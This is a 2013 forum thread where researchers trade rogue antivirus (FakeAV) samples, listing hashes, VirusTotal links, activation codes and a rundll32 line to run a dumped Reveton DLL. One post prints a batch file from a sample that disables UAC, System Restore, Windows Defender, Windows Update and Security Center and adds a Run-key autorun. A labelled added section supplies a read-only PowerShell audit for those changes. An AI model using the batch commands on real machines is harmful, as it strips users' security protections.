Re: Rogue Antimalware (FakeAV, 2013 year)

Posted: Sat Jul 13, 2013 6:15 pm
by Win32:Virut
System Care Antivirus - 3 samples

Re: Rogue Antimalware (FakeAV, 2013 year)

Posted: Mon Jul 15, 2013 9:49 am
by ISergey256
Win32:Virut wrote: 8 samples
Antivirus System
Activation Code: ?O?Z?L?W?I?T?F?Q?C?N?Y?K?V?H?S?E

FakeAV

Posted: Sat Jul 27, 2013 7:13 am
by Maxstar
I'm looking for the following sample.

MD5: 82c58b195fc854387e46893f32b026a6
https://www.virustotal.com/en/file/916c ... 374867056/

Thanks ;)

Re: FakeAV

Posted: Sat Jul 27, 2013 8:07 am
by p4r4n0id
attached!

Re: Rogue Antimalware (FakeAV, 2013 year)

Posted: Sat Jul 27, 2013 12:52 pm
by Xylitol

Re: Rogue Antimalware (FakeAV, 2013 year)

Posted: Sat Jul 27, 2013 4:10 pm
by Win32:Virut
System Care Antivirus - 19 files

Re: Rogue Antimalware (FakeAV, 2013 year)

Posted: Sun Jul 28, 2013 7:48 pm
by secObs
Internet Security

[image attachment]

MD5: 927921207a10dfb7fd7e0684c461527d
SHA-1: ae11df6844d12147c9507d78af057de1c51d6280

Re: Rogue Antimalware (FakeAV, 2013 year)

Posted: Mon Jul 29, 2013 4:58 pm
by andrew9406
Xylitol wrote: http://www.bleepingcomputer.com/virus-r ... -antivirus
Due to a request, here is the unpacked version with the anti-VM fixed.
https://www.virustotal.com/en/file/daf1 ... 374930794/
activation codes:
AA39754E-715219CE (seems to work with most winwebsec rogues)
AF03E-A1B69411-5E496BEE-92A70D00-1AD697F6

Re: Rogue Antimalware (FakeAV, 2013 year)

Posted: Thu Aug 01, 2013 8:45 pm
by Cody Johnston
Attentive Antivirus

[image attachment]

There were a few other goodies packaged with this as well

There are some other files in here as well:

1. 3X9DV7p6.exe
MD5: e7a7fb4d2c8b8d9594582618f099e337
https://www.virustotal.com/en/file/2691 ... 375387434/

2. 1891695800740633560.exe
MD5: c9d3ab7fa4d7ab64acebfa518ecb88bb
https://www.virustotal.com/en/file/2ac4 ... 375387391/

Some batch file found in the folder (Mad Skillz):
Code:
:: Turn off UAC prompts and UAC file/registry virtualization (policy takes effect at next logon/reboot)
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v EnableLUA /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v EnableVirtualization /t REG_DWORD /d 0 /f
:: Stop System Restore from creating its periodic restore points
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v RPSessionInterval /t REG_DWORD /d 0 /f
:: Stop Windows Defender, the Microsoft Antimalware service (MSE), Windows Update and Security Center
sc stop windefend
sc stop msmpsvc
sc stop wuauserv
sc stop wscsvc
:: ping is used as a sleep (about 2 seconds) so the service stops can complete
ping localhost -w 1000 -n 3 > nul
:: Set the same services to Disabled so they do not come back on reboot; luafv is the UAC virtualization filter driver
sc config windefend start= disabled
sc config msmpsvc start= disabled
sc config wuauserv start= disabled
sc config wscsvc start= disabled
sc config luafv start= disabled
ping localhost -w 1000 -n 2 > nul
:: Remove Defender's autorun entries and register the rogue's executable under the Run key instead
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v MSASCui /f
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Windows Defender" /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v AA2014 /t REG_SZ /d C:\ProgramData\3X9DV7p6\3X9DV7p6.exe
There are other files in the attachment, but those are the most interesting.
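The batch file above leaves a small, fixed set of host artifacts (UAC and System Restore policy values, service start types, a Run key entry). The following is an added example, not code from the thread or from the poster, of a read-only PowerShell audit that checks a host for exactly those artifacts; the registry keys, service names and the AA2014 Run value come from the posted script, while the C:\ProgramData\*\*.exe path pattern used to flag similar autorun entries is an assumption made here.

```powershell
# Added example (not from the thread): read-only audit for the tampering the
# posted batch file performs. Run from an elevated PowerShell prompt.
# Keys, service names and the 'AA2014' value are taken from the posted script;
# the ProgramData path pattern below is an assumption.

$PolicyKey   = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$RestoreKey  = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore'
$RunKey      = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
$ServicesKey = 'HKLM:\SYSTEM\CurrentControlSet\Services'

function Get-RegValue {
    param([string]$Path, [string]$Name)
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.$Name
}

function New-Finding {
    param([string]$Check, [string]$Detail)
    [pscustomobject]@{ Check = $Check; Detail = $Detail }
}

function Test-FakeAVTampering {
    $findings = @()

    # 1. UAC prompts and UAC virtualization switched off by policy
    foreach ($name in 'EnableLUA', 'EnableVirtualization') {
        if ((Get-RegValue $PolicyKey $name) -eq 0) {
            $findings += New-Finding "$name = 0" $PolicyKey
        }
    }

    # 2. System Restore checkpoint interval zeroed
    if ((Get-RegValue $RestoreKey 'RPSessionInterval') -eq 0) {
        $findings += New-Finding 'RPSessionInterval = 0' $RestoreKey
    }

    # 3. Security services set to Disabled (Start = 4 in the service's key).
    #    The registry is read directly because Get-Service does not list the
    #    luafv filter driver.
    foreach ($svc in 'windefend', 'msmpsvc', 'wuauserv', 'wscsvc', 'luafv') {
        $start = Get-RegValue (Join-Path $ServicesKey $svc) 'Start'
        if ($null -eq $start) { continue }   # not installed on this build
        if ($start -eq 4) {
            $findings += New-Finding "service $svc disabled" "Start=$start"
        }
    }

    # 4. Rogue autorun entry: the exact value name from the script, or any Run
    #    entry pointing into a ProgramData subfolder (assumed pattern).
    $run = Get-ItemProperty -Path $RunKey -ErrorAction SilentlyContinue
    if ($run) {
        foreach ($p in $run.PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }   # skip PowerShell metadata
            $data = [string]$p.Value
            if ($p.Name -eq 'AA2014' -or $data -like 'C:\ProgramData\*\*.exe') {
                $findings += New-Finding "Run\$($p.Name)" $data
            }
        }
    }

    return $findings
}

# Usage: print one row per indicator found; no output means nothing matched.
Test-FakeAVTampering | Format-Table -AutoSize
```

The deleted MSASCui and "Windows Defender" Run values are not checked, because their absence is normal on Windows versions that never shipped them; the added AA2014 entry and the disabled services are the reliable indicators.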

Re: Rogue Antimalware (FakeAV, 2013 year)

Posted: Fri Aug 02, 2013 1:09 pm
by ISergey256
Live Security Professional
to run -> rundll32 DUMP_003E0000-003EF000_unpack_reveton.dll, XFG00

original https://www.virustotal.com/ru/file/410f ... /analysis/
unpacked https://www.virustotal.com/ru/file/2f8c ... /analysis/
fakeav memory dump https://www.virustotal.com/ru/file/3f12 ... /analysis/

activation code F9292-QRT38-U9291-29291-3923F